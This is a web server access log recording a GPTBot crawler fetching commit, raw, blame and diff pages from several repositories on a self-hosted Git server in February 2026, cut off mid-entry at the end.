"/windpacer/homepage/rss/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11398] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:14:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11396] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:14:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11399] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:14:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11398] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:14:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 76514] [Gzip 16.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:14:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 238960] [Gzip 15.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:14:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 57146] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" +[17/Feb/2026:14:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 16199] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 239329] [Gzip 15.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 57159] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 57170] [Gzip 11.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 239339] [Gzip 15.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 16191] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10465] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10469] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" +[17/Feb/2026:14:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 440366] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:14:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" +[17/Feb/2026:14:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" +[17/Feb/2026:14:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:14:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:14:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:14:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12993] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12997] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:29:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:14:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues/new" +[17/Feb/2026:14:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" [Client 74.7.227.38] [Length 10453] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 